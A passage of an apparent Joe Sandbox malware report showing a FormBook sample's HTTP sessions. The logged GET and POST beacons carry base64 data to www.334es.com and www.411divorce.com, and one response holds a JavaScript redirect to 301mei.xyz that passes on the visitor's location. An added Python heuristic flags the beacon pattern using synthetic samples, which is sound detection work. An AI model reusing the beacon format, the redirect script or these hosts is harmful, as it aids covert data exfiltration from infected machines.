5a 6a 33 2b 70 54 6f 62 32 52 55 47 58 35 4d 67 45 48 59 44 49 52 6d 33 64 47 [TRUNCATED]
                                                          Data Ascii: D0Pts04=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 [TRUNCATED]
                                                          Jul 13, 2024 00:05:39.668555975 CEST | 552 | IN | HTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          48 | 192.168.2.6 | 49772 | 103.176.91.154 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:05:41.372349024 CEST | 463 | OUT | GET /8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.334es.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:42.187021017 CEST | 552 | IN | HTTP/1.0 200 OK
                                                          Connection: close
                                                          Cache-Control: max-age=259200
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 423
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
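Added example (not part of the Joe Sandbox report, and not code from the sample): a heuristic that flags requests with the beacon shape seen in sessions 45 to 48 above, using only what is visible in the captures. The request side is the stable part to detect: the path is a single short alphanumeric directory (/8c7z/ here, /6rlx/ in the sessions that follow), the User-Agent is the Yahoo! Slurp crawler string, Origin and Referer point back at the request's own host, Connection: close is paired with Cache-Control: no-cache, and the single form field (D0Pts04) carries base64 with '+', '/' and '=' left unescaped, which a browser-generated application/x-www-form-urlencoded body would percent-encode. The response side is not reliable: www.334es.com answers every beacon with the same hao123 redirect page and www.411divorce.com with a WordPress 404, which is what FormBook's decoy domains return; only one entry of its domain list is the live C2, so a meaningless reply does not make the request benign. The sample requests below are constructed, with a synthetic base64 blob in place of the real payload, and all function and field names are this example's own.

```python
"""Heuristic classifier for the beacon shape in the sessions above.
Added example, not part of the Joe Sandbox report or of the sample."""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    method: str
    path: str
    query: str
    headers: dict
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.x request (CRLF or LF line endings) into its parts."""
    head, _, body = raw.replace("\r\n", "\n").lstrip("\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        if line.strip():
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body.strip())


def split_form(data: str) -> list:
    """name=value pairs left undecoded: urllib.parse.parse_qs would turn the
    '+' of raw base64 into a space and hide the indicator. [::2] keeps the
    name and value from partition() and drops the '=' separator."""
    return [tuple(p.partition("=")[::2]) for p in data.split("&") if p]


_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")        # /8c7z/, /6rlx/
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_raw_base64(value: str, min_len: int = 32) -> bool:
    """Decodes as base64 and still contains '+', '/' or '=' unescaped, which a
    compliant form encoder would have percent-encoded."""
    if len(value) < min_len or len(value) % 4 or not _B64_RE.match(value):
        return False
    if not any(c in value for c in "+/="):
        return False
    try:
        base64.b64decode(value, validate=True)
    except binascii.Error:
        return False
    return True


def formbook_indicators(req: HttpRequest) -> list:
    """Names of the indicators the request matches, in a fixed order."""
    h, hits = req.headers, []
    host = h.get("host", "")
    if _PATH_RE.match(req.path):
        hits.append("short-dir-path")
    if "yahoo! slurp" in h.get("user-agent", "").lower():
        hits.append("slurp-user-agent")
    if host and h.get("origin") == f"http://{host}":
        hits.append("self-origin")
    if host and h.get("referer") == f"http://{host}{req.path}":
        hits.append("self-referer")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        hits.append("close-no-cache")
    fields = split_form(req.body if req.method == "POST" else req.query)
    if 1 <= len(fields) <= 2 and looks_like_raw_base64(fields[0][1]):
        hits.append("raw-base64-field")
    return hits


def is_formbook_beacon(req: HttpRequest, threshold: int = 3) -> bool:
    """The GET shape in session 48 scores exactly three, the POSTs score six."""
    return len(formbook_indicators(req)) >= threshold


def extract_ioc(req: HttpRequest) -> tuple:
    """(host, path, form field name): the values worth pivoting on once flagged."""
    fields = split_form(req.body if req.method == "POST" else req.query)
    return (req.headers.get("host", ""), req.path, fields[0][0] if fields else "")


# Constructed samples modelled on sessions 45 and 48 (headers trimmed).
# 0xfb 0xff 0xfb encodes to '+//7', so the synthetic blob carries the
# unescaped characters that a real form post would have percent-encoded.
SAMPLE_B64 = base64.b64encode(b"\xfb\xff\xfb" * 16).decode()
SLURP_UA = "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
SAMPLE_POST = (
    "POST /8c7z/ HTTP/1.1\r\nHost: www.334es.com\r\nOrigin: http://www.334es.com\r\n"
    "Connection: close\r\nCache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Referer: http://www.334es.com/8c7z/\r\nUser-Agent: {SLURP_UA}\r\n\r\nD0Pts04={SAMPLE_B64}"
)
SAMPLE_GET = (
    f"GET /8c7z/?D0Pts04={SAMPLE_B64}&Q8s=tdcd5h7ptjmdxx HTTP/1.1\r\nHost: www.334es.com\r\n"
    f"Connection: close\r\nUser-Agent: {SLURP_UA}\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /wp-json/?page=2 HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n"
    "Cache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0\r\n\r\n"
)
```

Tune the threshold to the traffic you see: the GET in session 48 carries no Origin or Referer and scores exactly three, while the POSTs score six, and the benign sample scores one on Connection/Cache-Control alone. split_form deliberately avoids urllib.parse.parse_qs, which would decode '+' to a space and destroy the raw-base64 indicator before it is checked.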


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          49 | 192.168.2.6 | 49773 | 5.78.41.174 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:05:47.286871910 CEST | 725 | OUT | POST /6rlx/ HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.411divorce.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.411divorce.com/6rlx/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 38 72 54 71 7a 52 56 6a 34 56 30 57 42 6b 53 68 5a 4f 4a 50 4c 71 34 33 66 65 67 31 62 36 4f 54 33 7a 53 4c 71 35 51 49 43 79 59 4c 79 31 4c 76 4f 62 76 66 75 65 6f 6e 4b 76 53 5a 34 48 66 34 53 5a 4e 33 59 39 72 70 34 68 63 79 75 4e 61 73 76 54 74 51 76 64 56 32 4a 5a 33 48 50 77 56 45 76 4f 78 45 39 72 4b 32 37 61 37 70 64 70 44 79 73 41 47 38 4e 6e 33 67 64 38 41 77 56 53 54 57 62 61 7a 56 36 38 4d 36 77 6b 6b 4b 47 38 61 39 30 54 49 41 47 4a 77 6c 77 45 69 45 49 56 51 54 62 65 56 64 4d 76 59 5a 6b 49 30 68 39 45 49 2f 35 4f 2b 53 77 36 73 6e 33 4e 6e 49 71 57 4a 53
                                                          Data Ascii: D0Pts04=d0xgGJJTOMlk8rTqzRVj4V0WBkShZOJPLq43feg1b6OT3zSLq5QICyYLy1LvObvfueonKvSZ4Hf4SZN3Y9rp4hcyuNasvTtQvdV2JZ3HPwVEvOxE9rK27a7pdpDysAG8Nn3gd8AwVSTWbazV68M6wkkKG8a90TIAGJwlwEiEIVQTbeVdMvYZkI0h9EI/5O+Sw6sn3NnIqWJS
                                                          Jul 13, 2024 00:05:48.250333071 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:05:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
                                                          Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/"
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -POST
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Content-Encoding: gzip
                                                          Data Raw: 34 62 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 7b db 36 d2 e8 e7 f8 79 f6 3f a0 4a 5b db 2d 29 51 57 db 52 ec dd 34 4d da 9c 6d 9b 6e 93 34 dd 5e 1e 3d 94 08 49 8c 29 52 25 29 5f ea f5 f9 2d e7 eb f9 72 7e c4 fb cb ce cc 00 24 41 12 d4 c5 97 d4 fb ee eb 36 b6 04 0c 06 33 03 60 30 00 06 83 27 1f 7d f9 ea d9 9b 7f 7e ff 9c cd e2 b9 77 b2 f3 04 ff 30 cf f6 a7 c7 35 ee 9b 6f 5f d7 30 8d db ce c9 ce a3 27 73 1e db 6c 3c b3 c3 88 c7 c7 b5 b7 6f 5e 98 87 35 d6 00 00 ca 98 c5 f1 c2 e4 bf 2f dd b3 e3 da 4f e6 db a7 e6 b3 60 be b0 63 77 e4 f1 1a 1b 07 7e cc 7d 28 f5 f2 f9 31 77 a6 bc 86 f8 3c d7 3f 65 21 f7 8e 6b 0b d7 9f 8e ec f1 69 8d cd 42 3e 39 ae 21 ae 7e a3 d1 69 36 1d f7 2c 08 c7 bc 3e 0e e6 8d 8b b9 17 2e c6 f5 c5 6c 41 d5 02 86 68 1c ba 8b 98 c5 97 0b 7e 5c 8b f9 45 dc 78 6f 9f d9 22 15 ab 78 e4 04 e3 e5 1c 2a ae 27 1f 9e 7b 9c be 8f 3d 3b 8a be b3 e7 9c 1d b3 dd f7 d1 ee 00 b0 35 44 41 28 07 5f 62 37 f6 f8 49 c7 ea b0 ef 82 98 bd 08 96 be c3 fe c5 5e 3f 7f c5 de 60 0e fb 9a 87 fc 49 43 40 [TRUNCATED]
                                                          Data Ascii: 4b75}k{6y?J[-)QWR4Mmn4^=I)R%)_-r~$A63`0'}~w05o_0'sl<o^5/O`cw~}(1w<?e!kiB>9!~i6,>.lAh~\Exo"x*'{=;5DA(_b7I^?`IC@8V O2F@,aEAN]8zu@fVl?2]8j'+*d{}V@S7"_'.__~I?OCRc}8#Vy-<8:6!{:nb{oS?8_^gOq>7
                                                          Jul 13, 2024 00:05:48.250382900 CEST | 1236 | IN | Data Raw: bf 7e f3 ed 37 06 f3 dc 53 ce be e2 e3 d3 60 9f bd b6 27 76 e8 4a 80 2f ed e5 bc d1 81 0f 9f 35 fe 86 12 31 27 f6 98 b3 2b f9 11 05 d1 67 bb 28 0a 86 a2 d8 1d 50 06 c9 bd cf 04 b3 22 e9 9c bb d3 19 90 09 5c 27 30 21 8f c7 b3 3e f3 83 70 6e 7b 22
                                                          Data Ascii: ~7S`'vJ/51'+g(P"\'0!>pn{"Qg }oDlQlYj/o_}9^~~7sNw?v?q<g'%?;?a~~X~{U>{]`
                                                          Jul 13, 2024 00:05:48.250459909 CEST | 1236 | IN | Data Raw: 95 ec 5e b8 7f 05 53 df 32 f4 0b 90 f5 7a 5d 4d 30 c2 a4 e8 b5 f1 f1 8d 4a 7f 7c 3d 38 a7 8d 8a ba 24 41 fc 31 64 e2 c7 f2 fb 00 89 1e 2f a1 99 e7 5f 73 db 79 4d ec 44 c7 1f 35 07 22 bf 3e f1 25 64 1d 94 5a 1c 10 fb 57 40 54 55 86 4c f3 83 67 81
                                                          Data Ascii: ^S2z]M0J|=8$A1d/_syMD5">%dZW@TULg?w'{9v<`<]CU/%!I)YP27df|w?Bg6-zM')'1FJa}~1 kywGihLg]5'C9oF0*1U/3=
                                                          Jul 13, 2024 00:05:48.250498056 CEST | 1236 | IN | Data Raw: 66 01 01 76 35 3b 4c 4b ec 35 db 5d 87 4f 8d 70 3a b2 f7 7a 46 b3 73 60 b4 5a 07 46 73 9f 59 9f 60 e2 5e b3 db 35 0e 9b 90 d8 d9 67 a0 4f 3f d9 af ac ba 28 e1 ac 6e 55 8c d5 f5 ef 35 5b 2d a8 c7 32 9a 87 56 5a bd 65 b4 ac 43 a3 d9 b6 d6 d6 ae e9
                                                          Data Ascii: fv5;LK5]Op:zFs`ZFsY`^5gO?(nU5[-2VZeCHAEZ%V4t+&v%"ETIZ*?D%V[V+>4@ y]W8<f8\WVx:Jk6>kt4 aaAC`@L %!Ce
                                                          Jul 13, 2024 00:05:48.250535965 CEST | 896 | IN | Data Raw: 37 d7 75 37 40 be 81 8e bb 01 d6 0d 75 db 0d 30 df 40 a7 dd a0 96 db e9 b2 db 57 b8 b9 0e bb 49 5d 37 d1 5d 37 6e aa ad 74 d6 4d bb da 56 ba ea c6 ac 6c ae a3 6e 5c 45 a5 6e 5a 73 e6 9a 1d 0b 28 ae 04 8a 9f 88 a6 de 8d cf 73 37 e9 87 9a 63 d8 5b
                                                          Data Ascii: 7u7@u0@WI]7]7ntMVln\EnZs(s7c[IMM*.gPibs[U[FWYgrZ{%VA<<?fgW_cVG/(;xT{TN/t8K}Nis
                                                          Jul 13, 2024 00:05:48.250570059 CEST | 1236 | IN | Data Raw: ba 80 f1 bb cc f9 5d 26 5c 25 3e 2d b5 da 20 f9 58 c0 95 08 0d 3d d4 98 c5 da 78 06 ac de 31 ea a6 f7 4c 72 67 c5 08 7e dd 9f 04 e3 65 74 95 8a f6 1a ba 4a e9 74 98 78 8e 67 20 91 e9 ec 1a da f6 2a 00 c9 a1 7b 88 b8 ac 92 fa ec 23 c2 89 3b 5d 86
                                                          Data Ascii: ]&\%>- X=x1Lrg~etJtxg *{#;]kq#"CBxw%4|{#c8=m'iR8#*X>Ka=z~+Z~\1/;<g@O0+z"'.DD~y&lSEP
                                                          Jul 13, 2024 00:05:48.250606060 CEST | 1236 | IN | Data Raw: 5f c5 a2 5f 49 10 53 21 cb ed b4 90 f8 fb 30 f0 b2 c0 1f 28 2a bc d9 84 fd 35 b7 20 20 8b 5d a1 25 28 d1 12 e4 69 09 8a b4 04 45 5a 02 0d 2d 7c ec 62 54 18 25 3d b5 09 60 51 07 cb 9c 12 a5 2b a9 5c 7a cc 73 b5 72 c3 74 20 40 31 93 11 1f 0a dd 2a
                                                          Data Ascii: __IS!0(*5 ]%(iEZ-|bT%=`Q+\zsrt @1*2GH)TTEFJ(/4mF9qynDysx(58AYTW.'j$%359U/2bD~|,)/VrAPnAC}M4)U
                                                          Jul 13, 2024 00:05:48.250638962 CEST | 1236 | IN | Data Raw: fa 4a 6a ee a0 4f 26 d7 e5 d2 07 fd 38 3c bc ce e0 9f 66 5b af 60 84 87 02 17 43 8f ae b4 0c e4 2c 46 30 bb 84 c1 39 ad 9f b5 19 b8 e2 56 33 f2 e7 89 59 86 b2 21 40 da 9f d5 e7 fc 7d 44 a3 6e 61 a3 0a 13 c3 8e c9 cd de b5 05 cf d0 4b 78 45 29 d4
                                                          Data Ascii: JjO&8<f[`C,F09V3Y!@}DnaKxE).6?Zvu;&8c>K`oK8NTC<><Q8LOS$V3-#;1 ;=qR4&OKn[EB+3it#]jD 0\BZ*
                                                          Jul 13, 2024 00:05:48.250674009 CEST | 1236 | IN | Data Raw: 92 38 ec b4 db ed 4a 9f 23 89 30 0c ce 15 9f e2 0d 7c 95 56 6c 56 5f e1 c1 5f aa 24 92 5b a0 5a 17 13 99 11 cd 82 73 b1 c9 cb 6e 50 1f 93 fe 24 c9 4d 16 7d 55 fb 37 44 ad b5 f7 7c 3c b2 d3 f9 6f 5e 2b fb fa 89 02 a1 ed 2f dd 96 7a 39 67 d5 26 a2
                                                          Data Ascii: 8J#0|VlV__$[ZsnP$M}U7D|<o^+/z9g&^&lESZn)'}y=\}"[DzLIQYolJ(:ZDG$q*^MVTy_'v%qo/! }UM|WQ[f\$nYE&4H
                                                          Jul 13, 2024 00:05:48.250711918 CEST | 1236 | IN | Data Raw: 78 0b 17 1b 4d e9 ed 3c 6d 34 08 12 87 1b cd b4 7e d0 3b 50 ec c9 2d 55 6b b5 21 90 bb 54 b7 26 bf ca 0c 20 98 b5 56 00 41 6d 6f 04 28 c5 b6 b2 01 b6 3e bc a4 02 65 0b c0 9c e1 b3 dd e2 36 d8 aa eb e3 1a 6d 45 18 37 9a 84 54 c8 2d e6 ae dc 65 e0
                                                          Data Ascii: xM<m4~;P-Uk!T& VAmo(>e6mE7T-e\\A%+-_9mYKWNZ26sVDbR:>z]5[U[dd7<U*(;DW*W*|W*btn[P!YBuRll8\
                                                          Jul 13, 2024 00:05:48.257841110 CEST | 1236 | IN | Data Raw: 72 d9 66 b2 e3 b3 97 93 5c 02 23 60 e8 6e 60 6e 32 79 ff cd c0 ce 1b c1 72 09 d6 f8 a2 3b 72 16 c0 02 d6 f5 6d 8f e0 73 bc e4 da 95 50 af ee 87 6a 43 a5 e0 55 2d 95 01 ac 10 7a 0a b4 4e ea ab b0 65 62 d7 a1 5b 21 f7 f5 0d 20 76 44 49 f4 e2 e3 ed
                                                          Data Ascii: rf\#`n`n2yr;rmsPjCU-zNeb[! vDIN$'=,An.TO{uj}Zx`zuCQWiEL\3V]]dpnDNQypR/)Pex%`:C2&<`fS


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          50 | 192.168.2.6 | 49774 | 5.78.41.174 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:05:49.830147028 CEST | 749 | OUT | POST /6rlx/ HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.411divorce.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.411divorce.com/6rlx/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 64 30 78 67 47 4a 4a 54 4f 4d 6c 6b 7a 72 44 71 78 32 68 6a 78 56 30 52 63 55 53 68 41 2b 49 45 4c 71 6b 33 66 66 30 6c 62 4a 6d 54 77 53 69 4c 74 37 6f 49 44 79 59 4c 39 56 4c 51 4e 72 75 52 75 65 6c 61 4b 71 79 5a 34 48 62 34 53 59 39 33 5a 4f 43 2f 34 78 63 73 68 74 61 79 72 54 74 51 76 64 56 32 4a 59 48 70 50 77 39 45 76 64 35 45 79 70 79 78 6b 71 37 6d 4a 35 44 79 6e 67 47 77 4e 6e 33 47 64 35 5a 64 56 52 37 57 62 61 44 56 36 74 4d 39 2f 6b 6b 45 43 38 62 6c 77 42 39 76 65 62 74 62 79 6b 71 6e 52 30 64 78 58 49 55 48 51 63 59 36 32 59 55 6a 39 47 51 4e 35 75 2b 34 79 36 55 6e 6c 61 72 76 6c 69 73 78 59 65 6f 2f 47 65 34 75 55 6e 6a 68 73 6b 59 53 4c 2f 4e 67 33 41 3d 3d
                                                          Data Ascii: D0Pts04=d0xgGJJTOMlkzrDqx2hjxV0RcUShA+IELqk3ff0lbJmTwSiLt7oIDyYL9VLQNruRuelaKqyZ4Hb4SY93ZOC/4xcshtayrTtQvdV2JYHpPw9Evd5Eypyxkq7mJ5DyngGwNn3Gd5ZdVR7WbaDV6tM9/kkEC8blwB9vebtbykqnR0dxXIUHQcY62YUj9GQN5u+4y6UnlarvlisxYeo/Ge4uUnjhskYSL/Ng3A==
                                                          Jul 13, 2024 00:05:50.813339949 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:05:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
                                                          Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/"
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -POST
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Content-Encoding: gzip


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          51          192.168.2.6  49775        5.78.41.174     80                5396  C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Jul 13, 2024 00:05:52.375850916 CEST  1762               OUT        POST /6rlx/ HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.411divorce.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.411divorce.com/6rlx/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:53.324980021 CEST  1236               IN         HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:05:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
                                                          Link: <http://411divorce.com/wp-json/>; rel="https://api.w.org/"
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: Prometheus
                                                          Pre-Cognitive-Push: Enabled
                                                          Quantum-Flux-Capacity: Omega
                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                          X-Grid-SRCache-TTL: 2592000
                                                          X-Grid-SRCache-Skip: -POST
                                                          X-Grid-SRCache-Fetch: BYPASS
                                                          X-Grid-SRCache-Store: BYPASS
                                                          Content-Encoding: gzip


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                          52          192.168.2.6  49776        5.78.41.174     80                5396  C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Jul 13, 2024 00:05:54.908226013 CEST  468                OUT        GET /6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.411divorce.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:55.732801914 CEST  1007               IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 12 Jul 2024 22:05:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: public, no-cache
